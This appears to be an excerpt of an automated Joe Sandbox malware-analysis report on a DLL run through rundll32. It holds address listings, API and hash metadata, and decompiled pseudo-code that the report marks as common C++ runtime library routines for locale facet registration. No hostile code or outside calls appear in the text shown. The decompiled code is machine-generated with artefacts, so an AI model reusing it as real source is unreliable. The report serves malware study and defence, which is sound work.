                          0x6e20f27e
                          0x6e20f2bb
                          0x6e20f2c9
                          0x6e20f2ce
                          0x6e20f2d6
                          0x6e20f2e0
                          0x6e20f2e5
                          0x6e20f2f0
                          0x6e20f2f4
                          0x6e20f2f7
                          0x6e20f2fc
                          0x6e20f305
                          0x6e20f307
                          0x6e20f309
                          0x6e20f34e
                          0x6e20f351
                          0x6e20f35d
                          0x6e20f30b
                          0x6e20f30b
                          0x6e20f30d
                          0x6e20f313
                          0x6e20f319
                          0x6e20f321
                          0x6e20f324
                          0x6e20f361
                          0x6e20f36f
                          0x6e20f374
                          0x6e20f37c
                          0x6e20f386
                          0x6e20f38b
                          0x6e20f396
                          0x6e20f39a
                          0x6e20f39d
                          0x6e20f3a2
                          0x6e20f3ab
                          0x6e20f3ad
                          0x6e20f3af
                          0x6e20f3f4
                          0x6e20f3f7
                          0x6e20f403
                          0x6e20f3b1
                          0x6e20f3b1
                          0x6e20f3b3
                          0x6e20f3b9
                          0x6e20f3bf
                          0x6e20f3c7
                          0x6e20f3ca
                          0x6e20f407
                          0x6e20f415
                          0x6e20f41a
                          0x6e20f422
                          0x6e20f42c
                          0x6e20f431
                          0x6e20f43c
                          0x6e20f440
                          0x6e20f443
                          0x6e20f448
                          0x6e20f451
                          0x6e20f453
                          0x6e20f455
                          0x6e20f49a
                          0x6e20f49d
                          0x6e20f4a9
                          0x6e20f457
                          0x6e20f457
                          0x6e20f459
                          0x6e20f45f
                          0x6e20f465
                          0x6e20f46d
                          0x6e20f470
                          0x6e20f4ad
                          0x6e20f4bb
                          0x6e20f4c0
                          0x6e20f4c8
                          0x6e20f4d2
                          0x6e20f4d7
                          0x6e20f4e2
                          0x6e20f4e6
                          0x6e20f4e9
                          0x6e20f4ee
                          0x6e20f4f7
                          0x6e20f4f9
                          0x6e20f4fb
                          0x6e20f540
                          0x6e20f543
                          0x6e20f54f
                          0x6e20f4fd
                          0x6e20f4fd
                          0x6e20f4ff
                          0x6e20f505
                          0x6e20f50b
                          0x6e20f513
                          0x6e20f516
                          0x6e20f553
                          0x6e20f561
                          0x6e20f566
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f59d
                          0x6e20f59f
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3
                          0x6e20f326
                          0x6e20f326
                          0x6e20f329
                          0x6e20f32d
                          0x6e20f331
                          0x6e20f33e
                          0x6e20f346
                          0x6e20f348
                          0x00000000
                          0x6e20f348
                          0x6e20f30f
                          0x6e20f30f
                          0x00000000
                          0x6e20f30f
                          0x6e20f30d
                          0x6e20f280
                          0x6e20f280
                          0x6e20f283
                          0x6e20f287
                          0x6e20f28b
                          0x6e20f298
                          0x6e20f2a0
                          0x6e20f2a2
                          0x00000000
                          0x6e20f2a2
                          0x6e20f269
                          0x6e20f269
                          0x00000000
                          0x6e20f269
                          0x6e20f267
                          0x6e20f1da
                          0x6e20f1da
                          0x6e20f1dd
                          0x6e20f1e1
                          0x6e20f1e5
                          0x6e20f1f2
                          0x6e20f1fa
                          0x6e20f1fc
                          0x00000000
                          0x6e20f1fc
                          0x6e20f1c3
                          0x6e20f1c3
                          0x00000000
                          0x6e20f1c3
                          0x6e20f1c1
                          0x6e20f134
                          0x6e20f134
                          0x6e20f137
                          0x6e20f13b
                          0x6e20f13f
                          0x6e20f14c
                          0x6e20f154
                          0x6e20f156
                          0x00000000
                          0x6e20f156
                          0x6e20f11d
                          0x6e20f11d
                          0x00000000
                          0x6e20f11d
                          0x6e20f11b
                          0x6e20f08e
                          0x6e20f08e
                          0x6e20f091
                          0x6e20f095
                          0x6e20f099
                          0x6e20f0a6
                          0x6e20f0ae
                          0x6e20f0b0
                          0x00000000
                          0x6e20f0b0
                          0x6e20f077
                          0x6e20f077
                          0x00000000
                          0x6e20f077
                          0x6e20f075

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F03E
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F048
                          • int.LIBCPMT ref: 6E20F05F
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • collate.LIBCPMT ref: 6E20F082
                          • std::_Facet_Register.LIBCPMT ref: 6E20F099
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F0B9
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F0D7
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
                          • String ID: hm,n
                          • API String ID: 2363045490-216170354
                          • Opcode ID: 369bf358384b0891e81e77dbc458c43d2a7b9511c54c6e9f5a7545020ce64823
                          • Instruction ID: 8519a0802e7460ad01b3930bf57e452b782981e6e66726a5dec00c1ad9930e6d
                          • Opcode Fuzzy Hash: 369bf358384b0891e81e77dbc458c43d2a7b9511c54c6e9f5a7545020ce64823
                          • Instruction Fuzzy Hash: 8C110676D0051ECBCF00DBE0C894AEEB7BBAF84715F240908E4106B2D4DBB59A45C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20A0FF, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20A0FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				void* _v16;
				char _v20;
				intOrPtr* _v24;
				char _v32;
				void* _t63;
				intOrPtr* _t64;
				void* _t76;
				void* _t89;
				void* _t102;
				intOrPtr* _t158;
				intOrPtr* _t174;
				intOrPtr* _t175;
				intOrPtr* _t176;
				void* _t178;
				intOrPtr* _t179;
				intOrPtr* _t180;
				void* _t181;

				_t171 = __edx;
				_t130 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t178 =  *0x6e2c6cc8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t178;
				_t63 = E6E1E161C(0x6e2c6b38);
				_t133 = _a8;
				_t64 = E6E1E171B(_a8, _t63);
				_t173 = _t64;
				if(_t64 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t173);
				} else {
					if(_t178 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E20A9D2(__ebx, _t133, __edx, _t173, _t178) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438( &_v32);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t173, _t178, 0x14);
							E6E206653( &_v20, 0);
							_t179 =  *0x6e2c6ccc; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t179;
							_t76 = E6E1E161C(0x6e2c6cb8);
							_t140 = _a8;
							_t174 = E6E1E171B(_a8, _t76);
							__eflags = _t174;
							if(_t174 != 0) {
								L12:
								E6E2066BA( &_v20);
								return E6E220075(_t174);
							} else {
								__eflags = _t179;
								if(_t179 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E20AA38(_t130, _t140, __edx, _t174, _t179) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438( &_v32);
										E6E223D74( &_v32, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t130, _t174, _t179, 0x14);
										E6E206653( &_v20, 0);
										_t180 =  *0x6e2c6cd0; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t180;
										_t89 = E6E1E161C(0x6e2c6cbc);
										_t147 = _a8;
										_t175 = E6E1E171B(_a8, _t89);
										__eflags = _t175;
										if(_t175 != 0) {
											L19:
											E6E2066BA( &_v20);
											return E6E220075(_t175);
										} else {
											__eflags = _t180;
											if(_t180 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6E20AAA0(_t130, _t147, __edx, _t175, _t180) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438( &_v32);
													E6E223D74( &_v32, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t130, _t175, _t180, 0x14);
													E6E206653( &_v20, 0);
													_t181 =  *0x6e2c6cd4; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t181;
													_t102 = E6E1E161C(0x6e2c6cc0);
													_t154 = _a8;
													_t176 = E6E1E171B(_a8, _t102);
													__eflags = _t176;
													if(_t176 != 0) {
														L26:
														E6E2066BA( &_v20);
														return E6E220075(_t176);
													} else {
														__eflags = _t181;
														if(_t181 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6E20AB08(_t130, _t154, _t171, _t176, _t181) - 0xffffffff;
															if(__eflags == 0) {
																_t158 =  &_v32;
																E6E1E1438(_t158);
																E6E223D74( &_v32, 0x6e2c3504);
																asm("int3");
																_push(_t158);
																 *((intOrPtr*)(_t158 + 4)) = _v8;
																_v24 = _t158;
																 *_t158 = 0x6e26ba24;
																return _t158;
															} else {
																_t176 = _v16;
																_v16 = _t176;
																_v4 = 1;
																E6E206FD3(__eflags, _t176);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t176 + 4))))();
																 *0x6e2c6cd4 = _t176;
																goto L26;
															}
														} else {
															_t176 = _t181;
															goto L26;
														}
													}
												} else {
													_t175 = _v16;
													_v16 = _t175;
													_v4 = 1;
													E6E206FD3(__eflags, _t175);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t175 + 4))))();
													 *0x6e2c6cd0 = _t175;
													goto L19;
												}
											} else {
												_t175 = _t180;
												goto L19;
											}
										}
									} else {
										_t174 = _v16;
										_v16 = _t174;
										_v4 = 1;
										E6E206FD3(__eflags, _t174);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 4))))();
										 *0x6e2c6ccc = _t174;
										goto L12;
									}
								} else {
									_t174 = _t179;
									goto L12;
								}
							}
						} else {
							_t173 = _v16;
							_v16 = _t173;
							_v4 = 1;
							E6E206FD3(__eflags, _t173);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t173 + 4))))();
							 *0x6e2c6cc8 = _t173;
							goto L5;
						}
					} else {
						_t173 = _t178;
						goto L5;
					}
				}
			}






















                          0x6e20a0ff
                          0x6e20a0ff
                          0x6e20a106
                          0x6e20a110
                          0x6e20a115
                          0x6e20a120
                          0x6e20a124
                          0x6e20a127
                          0x6e20a12c
                          0x6e20a130
                          0x6e20a135
                          0x6e20a139
                          0x6e20a17e
                          0x6e20a181
                          0x6e20a18d
                          0x6e20a13b
                          0x6e20a13d
                          0x6e20a143
                          0x6e20a149
                          0x6e20a151
                          0x6e20a154
                          0x6e20a191
                          0x6e20a19f
                          0x6e20a1a4
                          0x6e20a1ac
                          0x6e20a1b6
                          0x6e20a1bb
                          0x6e20a1c6
                          0x6e20a1ca
                          0x6e20a1cd
                          0x6e20a1d2
                          0x6e20a1db
                          0x6e20a1dd
                          0x6e20a1df
                          0x6e20a224
                          0x6e20a227
                          0x6e20a233
                          0x6e20a1e1
                          0x6e20a1e1
                          0x6e20a1e3
                          0x6e20a1e9
                          0x6e20a1ef
                          0x6e20a1f7
                          0x6e20a1fa
                          0x6e20a237
                          0x6e20a245
                          0x6e20a24a
                          0x6e20a252
                          0x6e20a25c
                          0x6e20a261
                          0x6e20a26c
                          0x6e20a270
                          0x6e20a273
                          0x6e20a278
                          0x6e20a281
                          0x6e20a283
                          0x6e20a285
                          0x6e20a2ca
                          0x6e20a2cd
                          0x6e20a2d9
                          0x6e20a287
                          0x6e20a287
                          0x6e20a289
                          0x6e20a28f
                          0x6e20a295
                          0x6e20a29d
                          0x6e20a2a0
                          0x6e20a2dd
                          0x6e20a2eb
                          0x6e20a2f0
                          0x6e20a2f8
                          0x6e20a302
                          0x6e20a307
                          0x6e20a312
                          0x6e20a316
                          0x6e20a319
                          0x6e20a31e
                          0x6e20a327
                          0x6e20a329
                          0x6e20a32b
                          0x6e20a370
                          0x6e20a373
                          0x6e20a37f
                          0x6e20a32d
                          0x6e20a32d
                          0x6e20a32f
                          0x6e20a335
                          0x6e20a33b
                          0x6e20a343
                          0x6e20a346
                          0x6e20a380
                          0x6e20a383
                          0x6e20a391
                          0x6e20a396
                          0x6e20a39a
                          0x6e20a39e
                          0x6e20a3a3
                          0x6e20a3a6
                          0x6e20a3ad
                          0x6e20a348
                          0x6e20a348
                          0x6e20a34b
                          0x6e20a34f
                          0x6e20a353
                          0x6e20a360
                          0x6e20a368
                          0x6e20a36a
                          0x00000000
                          0x6e20a36a
                          0x6e20a331
                          0x6e20a331
                          0x00000000
                          0x6e20a331
                          0x6e20a32f
                          0x6e20a2a2
                          0x6e20a2a2
                          0x6e20a2a5
                          0x6e20a2a9
                          0x6e20a2ad
                          0x6e20a2ba
                          0x6e20a2c2
                          0x6e20a2c4
                          0x00000000
                          0x6e20a2c4
                          0x6e20a28b
                          0x6e20a28b
                          0x00000000
                          0x6e20a28b
                          0x6e20a289
                          0x6e20a1fc
                          0x6e20a1fc
                          0x6e20a1ff
                          0x6e20a203
                          0x6e20a207
                          0x6e20a214
                          0x6e20a21c
                          0x6e20a21e
                          0x00000000
                          0x6e20a21e
                          0x6e20a1e5
                          0x6e20a1e5
                          0x00000000
                          0x6e20a1e5
                          0x6e20a1e3
                          0x6e20a156
                          0x6e20a156
                          0x6e20a159
                          0x6e20a15d
                          0x6e20a161
                          0x6e20a16e
                          0x6e20a176
                          0x6e20a178
                          0x00000000
                          0x6e20a178
                          0x6e20a13f
                          0x6e20a13f
                          0x00000000
                          0x6e20a13f
                          0x6e20a13d

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20A106
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20A110
                          • int.LIBCPMT ref: 6E20A127
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • ctype.LIBCPMT ref: 6E20A14A
                          • std::_Facet_Register.LIBCPMT ref: 6E20A161
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A181
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20A19F
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
                          • String ID: 8k,n
                          • API String ID: 1394824916-3277982818
                          • Opcode ID: dfef0be74a9ee87519e02a32c5871714b09756194fae8221ac19bc58ee90b160
                          • Instruction ID: b6c44b0feb4037195d911b7b5e00fb8f9856d6b3a6d158228e63df7fbba6607d
                          • Opcode Fuzzy Hash: dfef0be74a9ee87519e02a32c5871714b09756194fae8221ac19bc58ee90b160
                          • Instruction Fuzzy Hash: A011A3B5A1051D9BCF01DBE4C898AEDB77BAF44B14F140919E4106B2D0DFB49A44C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F0DD, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F0DD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t279;
				signed int _t280;
				void* _t292;
				void* _t305;
				void* _t318;
				void* _t331;
				void* _t344;
				void* _t357;
				void* _t370;
				void* _t383;
				void* _t396;
				void* _t409;
				void* _t422;
				void* _t435;
				void* _t448;
				void* _t461;
				void* _t474;
				void* _t487;
				void* _t500;
				void* _t513;
				signed int _t739;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				signed int _t829;
				signed int _t830;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				void* _t858;

				_t797 = __edx;
				_t606 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t858 - 0x14, 0);
				_t819 =  *0x6e2c6dd4; // 0x0
				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
				 *(_t858 - 0x10) = _t819;
				_t279 = E6E1E161C(0x6e2c6b28);
				_t609 =  *((intOrPtr*)(_t858 + 8));
				_t280 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t279);
				_t799 = _t280;
				if(_t280 != 0) {
					L5:
					E6E2066BA(_t858 - 0x14);
					return E6E220075(_t799);
				} else {
					if(_t819 == 0) {
						_push( *((intOrPtr*)(_t858 + 8)));
						_push(_t858 - 0x10);
